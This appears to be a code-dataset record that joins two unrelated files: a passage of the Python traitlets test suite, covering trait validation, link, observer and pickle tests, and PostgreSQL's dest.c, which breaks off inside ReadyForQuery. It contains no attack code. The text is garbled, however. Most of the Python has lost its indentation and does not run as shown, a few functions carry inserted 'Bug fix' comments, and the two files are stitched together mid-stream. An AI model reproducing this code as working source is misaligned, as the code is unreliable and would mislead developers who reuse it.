_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
200.1, '200.1']
def coerce(self, v):
return float(v)
class ComplexTrait(HasTraits):
value = Complex(99.0-99.0j)
class TestComplex(TraitTestBase):
obj = ComplexTrait()
_default_value = 99.0-99.0j
_good_values = [10, -10, 10.1, -10.1, 10j, 10+10j, 10-10j,
10.1j, 10.1+10.1j, 10.1-10.1j]
_bad_values = [u'10L', u'-10L', 'ten', [10], {'ten': 10},(10,), None]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class BytesTrait(HasTraits):
value = Bytes(b'string')
class TestBytes(TraitTestBase):
obj = BytesTrait()
_default_value = b'string'
_good_values = [b'10', b'-10', b'10L',
b'-10L', b'10.1', b'-10.1', b'string']
_bad_values = [10, -10, 10.1, -10.1, 1j, [10],
['ten'],{'ten': 10},(10,), None, u'string']
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class UnicodeTrait(HasTraits):
value = Unicode(u'unicode')
class TestUnicode(TraitTestBase):
obj = UnicodeTrait()
_default_value = u'unicode'
_good_values = ['10', '-10', '10L', '-10L', '10.1',
'-10.1', '', u'', 'string', u'string', u"€"]
_bad_values = [10, -10, 10.1, -10.1, 1j,
[10], ['ten'], [u'ten'], {'ten': 10},(10,), None]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class ObjectNameTrait(HasTraits):
value = ObjectName("abc")
class TestObjectName(TraitTestBase):
obj = ObjectNameTrait()
_default_value = "abc"
_good_values = ["a", "gh", "g9", "g_", "_G", u"a345_"]
_bad_values = [1, "", u"€", "9g", "!", "#abc", "aj@", "a.b", "a()", "a[0]",
None, object(), object]
if sys.version_info[0] < 3:
_bad_values.append(u"þ")
else:
_good_values.append(u"þ") # þ=1 is valid in Python 3 (PEP 3131).
class DottedObjectNameTrait(HasTraits):
value = DottedObjectName("a.b")
class TestDottedObjectName(TraitTestBase):
obj = DottedObjectNameTrait()
_default_value = "a.b"
_good_values = ["A", "y.t", "y765.__repr__", "os.path.join", u"os.path.join"]
_bad_values = [1, u"abc.€", "_.@", ".", ".abc", "abc.", ".abc.", None]
if sys.version_info[0] < 3:
_bad_values.append(u"t.þ")
else:
_good_values.append(u"t.þ")
class TCPAddressTrait(HasTraits):
value = TCPAddress()
class TestTCPAddress(TraitTestBase):
obj = TCPAddressTrait()
_default_value = ('127.0.0.1',0)
_good_values = [('localhost',0),('192.168.0.1',1000),('www.google.com',80)]
_bad_values = [(0,0),('localhost',10.0),('localhost',-1), None]
class ListTrait(HasTraits):
value = List(Int())
class TestList(TraitTestBase):
obj = ListTrait()
_default_value = []
_good_values = [[], [1], list(range(10)), (1,2)]
_bad_values = [10, [1,'a'], 'a']
def coerce(self, value):
if value is not None:
value = list(value)
return value
class Foo(object):
pass
class NoneInstanceListTrait(HasTraits):
value = List(Instance(Foo))
class TestNoneInstanceList(TraitTestBase):
obj = NoneInstanceListTrait()
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [[None], [Foo(), None]]
class InstanceListTrait(HasTraits):
value = List(Instance(__name__+'.Foo'))
class TestInstanceList(TraitTestBase):
obj = InstanceListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, Foo)
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [['1', 2,], '1', [Foo], None]
class UnionListTrait(HasTraits):
value = List(Int() | Bool())
class TestUnionListTrait(TraitTestBase):
    """Exercise List(Int() | Bool()) through the standard TraitTestBase checks.

    Bug fix: this class previously inherited ``HasTraits``, so none of the
    ``TraitTestBase`` machinery ran and the good/bad values below were never
    actually tested.
    """
    obj = UnionListTrait()

    _default_value = []
    # Each element must validate as either Int or Bool.
    _good_values = [[True, 1], [False, True]]
    # 'True' (a str) matches neither trait; a bare bool is not a list at all.
    _bad_values = [[1, 'True'], False]
class LenListTrait(HasTraits):
value = List(Int(), [0], minlen=1, maxlen=2)
class TestLenList(TraitTestBase):
obj = LenListTrait()
_default_value = [0]
_good_values = [[1], [1,2], (1,2)]
_bad_values = [10, [1,'a'], 'a', [], list(range(3))]
def coerce(self, value):
if value is not None:
value = list(value)
return value
class TupleTrait(HasTraits):
value = Tuple(Int(allow_none=True), default_value=(1,))
class TestTupleTrait(TraitTestBase):
obj = TupleTrait()
_default_value = (1,)
_good_values = [(1,), (0,), [1]]
_bad_values = [10, (1, 2), ('a'), (), None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int(), CBytes(), default_value=(1,5))
class LooseTupleTrait(HasTraits):
value = Tuple((1,2,3))
class TestLooseTupleTrait(TraitTestBase):
obj = LooseTupleTrait()
_default_value = (1,2,3)
_good_values = [(1,), [1], (0,), tuple(range(5)), tuple('hello'), ('a',5), ()]
_bad_values = [10, 'hello', {}, None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int(), CBytes(), default_value=(1,5))
class MultiTupleTrait(HasTraits):
value = Tuple(Int(), Bytes(), default_value=[99,b'bottles'])
class TestMultiTuple(TraitTestBase):
obj = MultiTupleTrait()
_default_value = (99,b'bottles')
_good_values = [(1,b'a'), (2,b'b')]
_bad_values = ((),10, b'a', (1,b'a',3), (b'a',1), (1, u'a'))
class CRegExpTrait(HasTraits):
value = CRegExp(r'')
class TestCRegExp(TraitTestBase):
def coerce(self, value):
return re.compile(value)
obj = CRegExpTrait()
_default_value = re.compile(r'')
_good_values = [r'\d+', re.compile(r'\d+')]
_bad_values = ['(', None, ()]
class DictTrait(HasTraits):
value = Dict()
def test_dict_assignment():
    """A dict assigned to a Dict trait is held by reference, not copied."""
    original = dict()
    holder = DictTrait()
    holder.value = original
    # Mutating the original must be visible through the trait...
    original['a'] = 5
    assert original == holder.value
    # ...because the trait stores the very same object.
    assert holder.value is original
class UniformlyValidatedDictTrait(HasTraits):
value = Dict(trait=Unicode(),
default_value={'foo': '1'})
class TestInstanceUniformlyValidatedDict(TraitTestBase):
obj = UniformlyValidatedDictTrait()
_default_value = {'foo': '1'}
_good_values = [{'foo': '0', 'bar': '1'}]
_bad_values = [{'foo': 0, 'bar': '1'}]
class KeyValidatedDictTrait(HasTraits):
value = Dict(traits={'foo': Int()},
default_value={'foo': 1})
class TestInstanceKeyValidatedDict(TraitTestBase):
obj = KeyValidatedDictTrait()
_default_value = {'foo': 1}
_good_values = [{'foo': 0, 'bar': '1'}, {'foo': 0, 'bar': 1}]
_bad_values = [{'foo': '0', 'bar': '1'}]
class FullyValidatedDictTrait(HasTraits):
value = Dict(trait=Unicode(),
traits={'foo': Int()},
default_value={'foo': 1})
class TestInstanceFullyValidatedDict(TraitTestBase):
obj = FullyValidatedDictTrait()
_default_value = {'foo': 1}
_good_values = [{'foo': 0, 'bar': '1'}, {'foo': 1, 'bar': '2'}]
_bad_values = [{'foo': 0, 'bar': 1}, {'foo': '0', 'bar': '1'}]
def test_dict_default_value():
    """Check that the `{}` default value of the Dict traitlet constructor is
    actually copied."""
    class Foo(HasTraits):
        d1 = Dict()
        d2 = Dict()
    instance = Foo()
    # Both defaults compare equal to an empty dict...
    assert instance.d1 == {}
    assert instance.d2 == {}
    # ...but each trait must have received its own copy, not a shared one.
    assert instance.d1 is not instance.d2
class TestValidationHook(TestCase):
def test_parity_trait(self):
"""Verify that the early validation hook is effective"""
class Parity(HasTraits):
value = Int(0)
parity = Enum(['odd', 'even'], default_value='even')
@validate('value')
def _value_validate(self, proposal):
value = proposal['value']
if self.parity == 'even' and value % 2:
raise TraitError('Expected an even number')
if self.parity == 'odd' and (value % 2 == 0):
raise TraitError('Expected an odd number')
return value
u = Parity()
u.parity = 'odd'
u.value = 1 # OK
with self.assertRaises(TraitError):
u.value = 2 # Trait Error
u.parity = 'even'
u.value = 2 # OK
def test_multiple_validate(self):
"""Verify that we can register the same validator to multiple names"""
class OddEven(HasTraits):
odd = Int(1)
even = Int(0)
@validate('odd', 'even')
def check_valid(self, proposal):
if proposal['trait'].name == 'odd' and not proposal['value'] % 2:
raise TraitError('odd should be odd')
if proposal['trait'].name == 'even' and proposal['value'] % 2:
raise TraitError('even should be even')
u = OddEven()
u.odd = 3 # OK
with self.assertRaises(TraitError):
u.odd = 2 # Trait Error
u.even = 2 # OK
with self.assertRaises(TraitError):
u.even = 3 # Trait Error
class TestLink(TestCase):
def test_connect_same(self):
"""Verify two traitlets of the same type can be linked together using link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Conenct the two classes.
c = link((a, 'value'), (b, 'value'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.value)
# Change one of the values to make sure they stay in sync.
a.value = 5
self.assertEqual(a.value, b.value)
b.value = 6
self.assertEqual(a.value, b.value)
def test_link_different(self):
"""Verify two traitlets of different types can be linked together using link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
class B(HasTraits):
count = Int()
a = A(value=9)
b = B(count=8)
# Conenct the two classes.
c = link((a, 'value'), (b, 'count'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.count)
# Change one of the values to make sure they stay in sync.
a.value = 5
self.assertEqual(a.value, b.count)
b.count = 4
self.assertEqual(a.value, b.count)
def test_unlink(self):
"""Verify two linked traitlets can be unlinked."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Connect the two classes.
c = link((a, 'value'), (b, 'value'))
a.value = 4
c.unlink()
# Change one of the values to make sure they don't stay in sync.
a.value = 5
self.assertNotEqual(a.value, b.value)
def test_callbacks(self):
"""Verify two linked traitlets have their callbacks called once."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
class B(HasTraits):
count = Int()
a = A(value=9)
b = B(count=8)
# Register callbacks that count.
callback_count = []
def a_callback(name, old, new):
callback_count.append('a')
a.on_trait_change(a_callback, 'value')
def b_callback(name, old, new):
callback_count.append('b')
b.on_trait_change(b_callback, 'count')
# Connect the two classes.
c = link((a, 'value'), (b, 'count'))
# Make sure b's count was set to a's value once.
self.assertEqual(''.join(callback_count), 'b')
del callback_count[:]
# Make sure a's value was set to b's count once.
b.count = 5
self.assertEqual(''.join(callback_count), 'ba')
del callback_count[:]
# Make sure b's count was set to a's value once.
a.value = 4
self.assertEqual(''.join(callback_count), 'ab')
del callback_count[:]
class TestDirectionalLink(TestCase):
    """Tests for directional_link: source changes propagate, target changes don't."""

    def test_connect_same(self):
        """Verify two traitlets of the same type can be linked together using directional_link."""
        # Create two simple classes with Int traitlets.
        class A(HasTraits):
            value = Int()
        a = A(value=9)
        b = A(value=8)
        # Connect the two classes.
        c = directional_link((a, 'value'), (b, 'value'))
        # Make sure the values are the same at the point of linking.
        self.assertEqual(a.value, b.value)
        # Change the value of the source and check that it synchronizes the target.
        a.value = 5
        self.assertEqual(b.value, 5)
        # Change the value of the target and check that it has no impact on the source.
        b.value = 6
        self.assertEqual(a.value, 5)

    def test_tranform(self):
        # NOTE: method name keeps its historical misspelling ("tranform") so
        # external test selection by name is not broken.
        """Test transform link."""
        # Create two simple classes with Int traitlets.
        class A(HasTraits):
            value = Int()
        a = A(value=9)
        b = A(value=8)
        # Connect the two classes with a doubling transform.
        c = directional_link((a, 'value'), (b, 'value'), lambda x: 2 * x)
        # Make sure the values are correct at the point of linking.
        self.assertEqual(b.value, 2 * a.value)
        # Change the value of the source and check that it modifies the target.
        a.value = 5
        self.assertEqual(b.value, 10)
        # Change the value of the target and check that it has no impact on the source.
        b.value = 6
        self.assertEqual(a.value, 5)

    def test_link_different(self):
        """Verify two traitlets of different types can be linked together using link."""
        # Create two simple classes with Int traitlets.
        class A(HasTraits):
            value = Int()
        class B(HasTraits):
            count = Int()
        a = A(value=9)
        b = B(count=8)
        # Connect the two classes.
        c = directional_link((a, 'value'), (b, 'count'))
        # Make sure the values are the same at the point of linking.
        self.assertEqual(a.value, b.count)
        # Change the value of the source and check that it synchronizes the target.
        a.value = 5
        self.assertEqual(b.count, 5)
        # Change the value of the target and check that it has no impact on the
        # source.  (Bug fix: this previously assigned b.value, which only set a
        # plain attribute on B — B's trait is named 'count'.)
        b.count = 6
        self.assertEqual(a.value, 5)

    def test_unlink(self):
        """Verify two linked traitlets can be unlinked."""
        # Create two simple classes with Int traitlets.
        class A(HasTraits):
            value = Int()
        a = A(value=9)
        b = A(value=8)
        # Connect the two classes.
        c = directional_link((a, 'value'), (b, 'value'))
        a.value = 4
        c.unlink()
        # Change one of the values to make sure they don't stay in sync.
        a.value = 5
        self.assertNotEqual(a.value, b.value)
class Pickleable(HasTraits):
i = Int()
@observe('i')
def _i_changed(self, change): pass
@validate('i')
def _i_validate(self, commit):
return commit['value']
j = Int()
def __init__(self):
with self.hold_trait_notifications():
self.i = 1
self.on_trait_change(self._i_changed, 'i')
def test_pickle_hastraits():
    """HasTraits instances survive a pickle round-trip at every protocol."""
    obj = Pickleable()

    def check_roundtrip(original):
        # Dump/load at each supported protocol and compare trait values.
        for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
            clone = pickle.loads(pickle.dumps(original, protocol))
            assert clone.i == original.i
            assert clone.j == original.j

    check_roundtrip(obj)
    # Repeat after mutating a trait, so non-default state is exercised too.
    obj.i = 5
    check_roundtrip(obj)
def test_hold_trait_notifications():
changes = []
class Test(HasTraits):
a = Integer(0)
b = Integer(0)
def _a_changed(self, name, old, new):
changes.append((old, new))
def _b_validate(self, value, trait):
if value != 0:
raise TraitError('Only 0 is a valid value')
return value
# Test context manager and nesting
t = Test()
with t.hold_trait_notifications():
with t.hold_trait_notifications():
t.a = 1
assert t.a == 1
assert changes == []
t.a = 2
assert t.a == 2
with t.hold_trait_notifications():
t.a = 3
assert t.a == 3
assert changes == []
t.a = 4
assert t.a == 4
assert changes == []
t.a = 4
assert t.a == 4
assert changes == []
assert changes == [(0, 4)]
# Test roll-back
try:
with t.hold_trait_notifications():
t.b = 1 # raises a Trait error
except:
pass
assert t.b == 0
class RollBack(HasTraits):
bar = Int()
def _bar_validate(self, value, trait):
if value:
raise TraitError('foobar')
return value
class TestRollback(TestCase):
def test_roll_back(self):
def assign_rollback():
RollBack(bar=1)
self.assertRaises(TraitError, assign_rollback)
class CacheModification(HasTraits):
foo = Int()
bar = Int()
def _bar_validate(self, value, trait):
self.foo = value
return value
def _foo_validate(self, value, trait):
self.bar = value
return value
def test_cache_modification():
CacheModification(foo=1)
CacheModification(bar=1)
class OrderTraits(HasTraits):
notified = Dict()
a = Unicode()
b = Unicode()
c = Unicode()
d = Unicode()
e = Unicode()
f = Unicode()
g = Unicode()
h = Unicode()
i = Unicode()
j = Unicode()
k = Unicode()
l = Unicode()
def _notify(self, name, old, new):
"""check the value of all traits when each trait change is triggered
This verifies that the values are not sensitive
to dict ordering when loaded from kwargs
"""
# check the value of the other traits
# when a given trait change notification fires
self.notified[name] = {
c: getattr(self, c) for c in 'abcdefghijkl'
}
def __init__(self, **kwargs):
self.on_trait_change(self._notify)
super(OrderTraits, self).__init__(**kwargs)
def test_notification_order():
d = {c:c for c in 'abcdefghijkl'}
obj = OrderTraits()
assert obj.notified == {}
obj = OrderTraits(**d)
notifications = {
c: d for c in 'abcdefghijkl'
}
assert obj.notified == notifications
###
# Traits for Forward Declaration Tests
###
class ForwardDeclaredInstanceTrait(HasTraits):
value = ForwardDeclaredInstance('ForwardDeclaredBar', allow_none=True)
class ForwardDeclaredTypeTrait(HasTraits):
value = ForwardDeclaredType('ForwardDeclaredBar', allow_none=True)
class ForwardDeclaredInstanceListTrait(HasTraits):
value = List(ForwardDeclaredInstance('ForwardDeclaredBar'))
class ForwardDeclaredTypeListTrait(HasTraits):
value = List(ForwardDeclaredType('ForwardDeclaredBar'))
###
# End Traits for Forward Declaration Tests
###
###
# Classes for Forward Declaration Tests
###
class ForwardDeclaredBar(object):
pass
class ForwardDeclaredBarSub(ForwardDeclaredBar):
pass
###
# End Classes for Forward Declaration Tests
###
###
# Forward Declaration Tests
###
class TestForwardDeclaredInstanceTrait(TraitTestBase):
obj = ForwardDeclaredInstanceTrait()
_default_value = None
_good_values = [None, ForwardDeclaredBar(), ForwardDeclaredBarSub()]
_bad_values = ['foo', 3, ForwardDeclaredBar, ForwardDeclaredBarSub]
class TestForwardDeclaredTypeTrait(TraitTestBase):
obj = ForwardDeclaredTypeTrait()
_default_value = None
_good_values = [None, ForwardDeclaredBar, ForwardDeclaredBarSub]
_bad_values = ['foo', 3, ForwardDeclaredBar(), ForwardDeclaredBarSub()]
class TestForwardDeclaredInstanceList(TraitTestBase):
obj = ForwardDeclaredInstanceListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, ForwardDeclaredBar)
_default_value = []
_good_values = [
[ForwardDeclaredBar(), ForwardDeclaredBarSub()],
[],
]
_bad_values = [
ForwardDeclaredBar(),
[ForwardDeclaredBar(), 3, None],
'1',
# Note that this is the type, not an instance.
[ForwardDeclaredBar],
[None],
None,
]
class TestForwardDeclaredTypeList(TraitTestBase):
obj = ForwardDeclaredTypeListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, ForwardDeclaredBar)
_default_value = []
_good_values = [
[ForwardDeclaredBar, ForwardDeclaredBarSub],
[],
]
_bad_values = [
ForwardDeclaredBar,
[ForwardDeclaredBar, 3],
'1',
# Note that this is an instance, not the type.
[ForwardDeclaredBar()],
[None],
None,
]
###
# End Forward Declaration Tests
###
class TestDynamicTraits(TestCase):
def setUp(self):
self._notify1 = []
def notify1(self, name, old, new):
self._notify1.append((name, old, new))
def test_notify_all(self):
class A(HasTraits):
pass
a = A()
self.assertTrue(not hasattr(a, 'x'))
self.assertTrue(not hasattr(a, 'y'))
# Dynamically add trait x.
a.add_traits(x=Int())
self.assertTrue(hasattr(a, 'x'))
self.assertTrue(isinstance(a, (A, )))
# Dynamically add trait y.
a.add_traits(y=Float())
self.assertTrue(hasattr(a, 'y'))
self.assertTrue(isinstance(a, (A, )))
self.assertEqual(a.__class__.__name__, A.__name__)
# Create a new instance and verify that x and y
# aren't defined.
b = A()
self.assertTrue(not hasattr(b, 'x'))
self.assertTrue(not hasattr(b, 'y'))
# Verify that notification works like normal.
a.on_trait_change(self.notify1)
a.x = 0
self.assertEqual(len(self._notify1), 0)
a.y = 0.0
self.assertEqual(len(self._notify1), 0)
a.x = 10
self.assertTrue(('x', 0, 10) in self._notify1)
a.y = 10.0
self.assertTrue(('y', 0.0, 10.0) in self._notify1)
self.assertRaises(TraitError, setattr, a, 'x', 'bad string')
self.assertRaises(TraitError, setattr, a, 'y', 'bad string')
self._notify1 = []
a.on_trait_change(self.notify1, remove=True)
a.x = 20
a.y = 20.0
self.assertEqual(len(self._notify1), 0)
def test_enum_no_default():
    """An Enum with no default raises on read until a value is supplied."""
    class C(HasTraits):
        t = Enum(['a', 'b'])

    # Assigning first makes the trait readable.
    assigned = C()
    assigned.t = 'a'
    assert assigned.t == 'a'

    # Reading before any assignment is an error.
    untouched = C()
    with pytest.raises(TraitError):
        untouched.t

    # Supplying the value at construction time also works.
    constructed = C(t='b')
    assert constructed.t == 'b'
def test_default_value_repr():
class C(HasTraits):
t = Type('traitlets.HasTraits')
t2 = Type(HasTraits)
n = Integer(0)
lis = List()
d = Dict()
assert C.t.default_value_repr() == "'traitlets.HasTraits'"
assert C.t2.default_value_repr() == "'traitlets.traitlets.HasTraits'"
assert C.n.default_value_repr() == '0'
assert C.lis.default_value_repr() == '[]'
assert C.d.default_value_repr() == '{}'
class TransitionalClass(HasTraits):
d = Any()
@default('d')
def _d_default(self):
return TransitionalClass
parent_super = False
calls_super = Integer(0)
@default('calls_super')
def _calls_super_default(self):
return -1
@observe('calls_super')
@observe_compat
def _calls_super_changed(self, change):
self.parent_super = change
parent_override = False
overrides = Integer(0)
@observe('overrides')
@observe_compat
def _overrides_changed(self, change):
self.parent_override = change
class SubClass(TransitionalClass):
def _d_default(self):
return SubClass
subclass_super = False
def _calls_super_changed(self, name, old, new):
self.subclass_super = True
super(SubClass, self)._calls_super_changed(name, old, new)
subclass_override = False
def _overrides_changed(self, name, old, new):
self.subclass_override = True
def test_subclass_compat():
    """Static-style handlers defined in a subclass shadow the decorated parent ones."""
    instance = SubClass()

    # A subclass handler that calls super() fires both notification paths.
    instance.calls_super = 5
    assert instance.parent_super
    assert instance.subclass_super

    # A plain override replaces the parent's decorated observer entirely.
    instance.overrides = 5
    assert instance.subclass_override
    assert not instance.parent_override

    # _d_default defined without @default still overrides the parent's default.
    assert instance.d is SubClass
class DefinesHandler(HasTraits):
parent_called = False
trait = Integer()
@observe('trait')
def handler(self, change):
self.parent_called = True
class OverridesHandler(DefinesHandler):
child_called = False
@observe('trait')
def handler(self, change):
self.child_called = True
def test_subclass_override_observer():
obj = OverridesHandler()
obj.trait = 5
assert obj.child_called
assert not obj.parent_called
class DoesntRegisterHandler(DefinesHandler):
child_called = False
def handler(self, change):
self.child_called = True
def test_subclass_override_not_registered():
"""Subclass that overrides observer and doesn't re-register unregisters both"""
obj = DoesntRegisterHandler()
obj.trait = 5
assert not obj.child_called
assert not obj.parent_called
class AddsHandler(DefinesHandler):
child_called = False
@observe('trait')
def child_handler(self, change):
self.child_called = True
def test_subclass_add_observer():
obj = AddsHandler()
obj.trait = 5
assert obj.child_called
assert obj.parent_called
def test_observe_iterables():
class C(HasTraits):
i = Integer()
s = Unicode()
c = C()
recorded = {}
def record(change):
recorded['change'] = change
# observe with names=set
c.observe(record, names={'i', 's'})
c.i = 5
assert recorded['change'].name == 'i'
assert recorded['change'].new == 5
c.s = 'hi'
assert recorded['change'].name == 's'
assert recorded['change'].new == 'hi'
# observe with names=custom container with iter, contains
class MyContainer(object):
def __init__(self, container):
self.container = container
def __iter__(self):
return iter(self.container)
def __contains__(self, key):
return key in self.container
c.observe(record, names=MyContainer({'i', 's'}))
c.i = 10
assert recorded['change'].name == 'i'
assert recorded['change'].new == 10
c.s = 'ok'
assert recorded['change'].name == 's'
assert recorded['change'].new == 'ok'
def test_super_args():
class SuperRecorder(object):
def __init__(self, *args, **kwargs):
self.super_args = args
self.super_kwargs = kwargs
class SuperHasTraits(HasTraits, SuperRecorder):
i = Integer()
obj = SuperHasTraits('a1', 'a2', b=10, i=5, c='x')
assert obj.i == 5
assert not hasattr(obj, 'b')
assert not hasattr(obj, 'c')
assert obj.super_args == ('a1' , 'a2')
assert obj.super_kwargs == {'b': 10 , 'c': 'x'}
def test_super_bad_args():
class SuperHasTraits(HasTraits):
a = Integer()
if sys.version_info < (3,):
# Legacy Python, object.__init__ warns itself, instead of raising
w = ['object.__init__']
else:
w = ["Passing unrecoginized arguments"]
with expected_warnings(w):
obj = SuperHasTraits(a=1, b=2)
assert obj.a == 1
assert not hasattr(obj, 'b') | unknown | codeparrot/codeparrot-clean | ||
/*-------------------------------------------------------------------------
*
* dest.c
* support for communication destinations
*
*
* Portions Copyright (c) 1996-2026, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* IDENTIFICATION
* src/backend/tcop/dest.c
*
*-------------------------------------------------------------------------
*/
/*
* INTERFACE ROUTINES
* BeginCommand - initialize the destination at start of command
* CreateDestReceiver - create tuple receiver object for destination
* EndCommand - clean up the destination at end of command
* NullCommand - tell dest that an empty query string was recognized
* ReadyForQuery - tell dest that we are ready for a new query
*
* NOTES
* These routines do the appropriate work before and after
* tuples are returned by a query to keep the backend and the
* "destination" portals synchronized.
*/
#include "postgres.h"
#include "access/printsimple.h"
#include "access/printtup.h"
#include "access/xact.h"
#include "commands/copy.h"
#include "commands/createas.h"
#include "commands/explain_dr.h"
#include "commands/matview.h"
#include "executor/functions.h"
#include "executor/tqueue.h"
#include "executor/tstoreReceiver.h"
#include "libpq/libpq.h"
#include "libpq/pqformat.h"
/* ----------------
 *		dummy DestReceiver functions
 * ----------------
 */

/*
 * donothingReceive --- accept one tuple and discard it.
 *
 * Always returns true so the executor keeps sending tuples.
 */
static bool
donothingReceive(TupleTableSlot *slot, DestReceiver *self)
{
	return true;
}
/* donothingStartup --- no-op startup callback for the dummy receivers */
static void
donothingStartup(DestReceiver *self, int operation, TupleDesc typeinfo)
{
}
/* donothingCleanup --- no-op cleanup callback for the dummy receivers */
static void
donothingCleanup(DestReceiver *self)
{
	/* this is used for both shutdown and destroy methods */
}
/* ----------------
 *		static DestReceiver structs for dest types needing no local state
 *
 *		Initializer order matches the callbacks above (receive, startup,
 *		shutdown, destroy) followed by the CommandDest tag — see the
 *		DestReceiver declaration for the authoritative field order.
 * ----------------
 */
static const DestReceiver donothingDR = {
	donothingReceive, donothingStartup, donothingCleanup, donothingCleanup,
	DestNone
};

static const DestReceiver debugtupDR = {
	debugtup, debugStartup, donothingCleanup, donothingCleanup,
	DestDebug
};

static const DestReceiver printsimpleDR = {
	printsimple, printsimple_startup, donothingCleanup, donothingCleanup,
	DestRemoteSimple
};

static const DestReceiver spi_printtupDR = {
	spi_printtup, spi_dest_startup, donothingCleanup, donothingCleanup,
	DestSPI
};

/*
 * Globally available receiver for DestNone.
 *
 * It's ok to cast the constness away as any modification of the none receiver
 * would be a bug (which gets easier to catch this way).
 */
DestReceiver *None_Receiver = (DestReceiver *) &donothingDR;
/* ----------------
 *		BeginCommand - initialize the destination at start of command
 *
 *		Currently a no-op; both parameters are unused.
 * ----------------
 */
void
BeginCommand(CommandTag commandTag, CommandDest dest)
{
	/* Nothing to do at present */
}
/* ----------------
 *		CreateDestReceiver - return appropriate receiver function set for dest
 *
 *		Stateless destinations share the static structs above; destinations
 *		needing local state get a receiver built by their owning module.
 * ----------------
 */
DestReceiver *
CreateDestReceiver(CommandDest dest)
{
	/*
	 * It's ok to cast the constness away as any modification of the none
	 * receiver would be a bug (which gets easier to catch this way).
	 */
	switch (dest)
	{
		case DestRemote:
		case DestRemoteExecute:
			/* remote protocol output: receiver is constructed per call */
			return printtup_create_DR(dest);

		case DestRemoteSimple:
			return unconstify(DestReceiver *, &printsimpleDR);

		case DestNone:
			return unconstify(DestReceiver *, &donothingDR);

		case DestDebug:
			return unconstify(DestReceiver *, &debugtupDR);

		case DestSPI:
			return unconstify(DestReceiver *, &spi_printtupDR);

		case DestTuplestore:
			return CreateTuplestoreDestReceiver();

		case DestIntoRel:
			return CreateIntoRelDestReceiver(NULL);

		case DestCopyOut:
			return CreateCopyDestReceiver();

		case DestSQLFunction:
			return CreateSQLFunctionDestReceiver();

		case DestTransientRel:
			return CreateTransientRelDestReceiver(InvalidOid);

		case DestTupleQueue:
			return CreateTupleQueueDestReceiver(NULL);

		case DestExplainSerialize:
			return CreateExplainSerializeDestReceiver(NULL);
	}

	/* should never get here */
	pg_unreachable();
}
/* ----------------
 *		EndCommand - clean up the destination at end of command
 *
 *		For remote destinations, ships a CommandComplete message carrying
 *		the query-completion tag to the frontend; all other destinations
 *		need no end-of-command action.
 * ----------------
 */
void
EndCommand(const QueryCompletion *qc, CommandDest dest, bool force_undecorated_output)
{
	char		completionTag[COMPLETION_TAG_BUFSIZE];
	Size		len;

	switch (dest)
	{
		case DestRemote:
		case DestRemoteExecute:
		case DestRemoteSimple:

			/*
			 * The tag is sent as a null-terminated string, hence len + 1.
			 *
			 * Bug fix: a break was missing here, silently falling through
			 * into the no-op cases below.  Harmless only by accident, and
			 * it trips -Wimplicit-fallthrough.
			 */
			len = BuildQueryCompletionString(completionTag, qc,
											 force_undecorated_output);
			pq_putmessage(PqMsg_CommandComplete, completionTag, len + 1);
			break;

		case DestNone:
		case DestDebug:
		case DestSPI:
		case DestTuplestore:
		case DestIntoRel:
		case DestCopyOut:
		case DestSQLFunction:
		case DestTransientRel:
		case DestTupleQueue:
		case DestExplainSerialize:
			/* no frontend connection; nothing to report */
			break;
	}
}
/* ----------------
 *		EndReplicationCommand - stripped down version of EndCommand
 *
 *		For use by replication commands.
 * ----------------
 */
void
EndReplicationCommand(const char *commandTag)
{
	/* tag goes out as a null-terminated string, hence the + 1 */
	pq_putmessage(PqMsg_CommandComplete, commandTag, strlen(commandTag) + 1);
}
/* ----------------
 *		NullCommand - tell dest that an empty query string was recognized
 *
 *		This ensures that there will be a recognizable end to the response
 *		to an Execute message in the extended query protocol.
 * ----------------
 */
void
NullCommand(CommandDest dest)
{
	switch (dest)
	{
		case DestRemote:
		case DestRemoteExecute:
		case DestRemoteSimple:
			/* Tell the FE that we saw an empty query string */
			pq_putemptymessage(PqMsg_EmptyQueryResponse);
			break;

		case DestNone:
		case DestDebug:
		case DestSPI:
		case DestTuplestore:
		case DestIntoRel:
		case DestCopyOut:
		case DestSQLFunction:
		case DestTransientRel:
		case DestTupleQueue:
		case DestExplainSerialize:
			/* no frontend connection; nothing to report */
			break;
	}
}
/* ----------------
 *		ReadyForQuery - tell dest that we are ready for a new query
 *
 *		The ReadyForQuery message is sent so that the FE can tell when
 *		we are done processing a query string.
 *		In versions 3.0 and up, it also carries a transaction state indicator.
 *
 *		Note that by flushing the stdio buffer here, we can avoid doing it
 *		most other places and thus reduce the number of separate packets sent.
 * ----------------
 */
void
ReadyForQuery(CommandDest dest)
{
	switch (dest)
	{
		case DestRemote:
		case DestRemoteExecute:
		case DestRemoteSimple:
			{
				StringInfoData buf;

				/* message payload is a single transaction-status byte */
				pq_beginmessage(&buf, PqMsg_ReadyForQuery);
				pq_sendbyte(&buf, TransactionBlockStatusCode());
				pq_endmessage(&buf);
			}
			/* Flush output at end of cycle in any case. */
			pq_flush();
			break;

		case DestNone:
